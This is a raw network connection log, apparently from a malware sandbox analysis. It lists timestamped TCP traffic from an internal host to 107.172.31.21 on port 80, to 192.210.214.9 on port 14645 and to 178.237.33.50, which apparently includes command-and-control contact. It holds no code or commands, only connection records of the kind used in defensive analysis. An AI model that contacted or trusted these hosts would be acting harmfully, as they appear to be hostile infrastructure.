                                                                      Aug 28, 2024 06:54:13.599617004 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599647045 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599724054 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599735022 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599745035 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599756002 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599766970 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599776030 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599776983 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599783897 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.600425959 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.600436926 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.600447893 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.600474119 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.600493908 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.675467014 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.857228041 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:13.862011909 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:13.862076998 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:13.871965885 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:13.876712084 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.415477991 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.551207066 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.551269054 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.575594902 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.580363035 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.580444098 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.585195065 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:14.585257053 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:14.590008020 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.265389919 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.267187119 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.271971941 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.364438057 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.368012905 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.372737885 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.374420881 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.378243923 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.383003950 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:15.425385952 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:15.430157900 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:15.430222988 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:15.430372953 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:15.435092926 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:15.565187931 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:15.909461021 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.039000988 CEST8049175178.237.33.50192.168.2.22
                                                                      Aug 28, 2024 06:54:16.039141893 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.039220095 CEST4917580192.168.2.22178.237.33.50
                                                                      Aug 28, 2024 06:54:16.039220095 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.043598890 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.048338890 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.048523903 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.049653053 CEST4917314645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.053250074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.054395914 CEST1464549173192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277117014 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277126074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277136087 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277173996 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277173042 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277185917 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277221918 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277295113 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277309895 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277321100 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277332067 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277343035 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277345896 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277353048 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.277373075 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277384996 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.277769089 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.281960011 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.282001972 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.282011032 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.365916967 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.365964890 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.747895956 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.747910976 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.747920990 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.747941017 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.748049021 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748059988 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748069048 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748078108 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748089075 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748089075 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.748100042 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748110056 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748111010 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.748137951 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.748734951 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748753071 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748763084 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748800993 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.748842955 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748857021 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.748886108 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.751698017 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752111912 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752121925 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752131939 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752152920 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752244949 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752255917 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752264977 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752274990 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752284050 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752288103 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752298117 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752319098 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752374887 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752386093 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752396107 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752413988 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752470016 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752479076 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752500057 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752500057 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752511978 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752547026 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752621889 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752631903 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752641916 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752651930 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752662897 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752664089 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752675056 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752681017 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.752687931 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.752722979 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.753432989 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753443956 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753453016 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753463030 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753473043 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753473043 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.753489971 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753492117 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.753510952 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753520966 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753521919 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.753532887 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753544092 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753554106 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753563881 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.753566027 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.753585100 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.754105091 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.754147053 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.754179955 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756036043 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756531000 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756541014 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756550074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756570101 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756619930 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756630898 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756639957 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756649971 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756659031 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756670952 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756751060 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756761074 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756771088 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756783962 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756792068 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756798029 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756823063 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756874084 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756885052 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756894112 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756903887 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756915092 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756915092 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756927013 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756937981 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.756948948 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.756973028 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.760859013 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.760869026 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.760878086 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.760902882 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.760974884 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.760986090 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.760994911 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761008024 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761010885 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761017084 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761028051 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761033058 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761065006 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761075020 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761085033 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761096954 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761101961 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761198044 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761209011 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761225939 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761235952 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761236906 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761246920 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761259079 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761264086 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761270046 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761281013 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761292934 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761302948 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761327982 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761358023 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761369944 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761387110 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761398077 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761404991 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761493921 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761511087 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761522055 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761532068 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761542082 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761543989 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761553049 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761573076 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.761888027 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761975050 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761985064 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.761996031 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762006044 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762032032 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762067080 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762079000 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762089014 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762100935 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762108088 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762135983 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762201071 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762211084 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762221098 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762233019 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762240887 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762244940 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762264967 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762393951 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762407064 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762417078 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762428045 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762430906 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762439966 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762450933 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762460947 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762459993 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762470007 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762474060 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762485027 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762495041 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762495041 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762514114 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762521982 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762522936 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762536049 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.762545109 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762643099 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762669086 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.762881041 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763104916 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763114929 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763124943 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763137102 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763144970 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763149023 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763159990 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763170958 CEST1464549174192.210.214.9192.168.2.22
                                                                      Aug 28, 2024 06:54:16.763179064 CEST4917414645192.168.2.22192.210.214.9
                                                                      Aug 28, 2024 06:54:16.763184071 CEST1464549174192.210.214.9192.168.2.22
Aug 28, 2024 06:54:16.763195038 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763200998 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763206959 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763216972 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763228893 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763250113 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763346910 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763359070 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763369083 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763377905 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763387918 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763396978 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763398886 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763411045 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763417959 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763421059 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763432980 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763442039 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763443947 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763458967 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763463020 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763472080 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763493061 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763500929 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763511896 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.763545036 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.763885975 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.764883995 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.773557901 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809607029 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809633017 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809643030 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809662104 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809672117 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809681892 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809684992 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809698105 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
Aug 28, 2024 06:54:16.809705019 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809734106 CEST | 49174 | 14645 | 192.168.2.22 | 192.210.214.9
Aug 28, 2024 06:54:16.809762955 CEST | 14645 | 49174 | 192.210.214.9 | 192.168.2.22
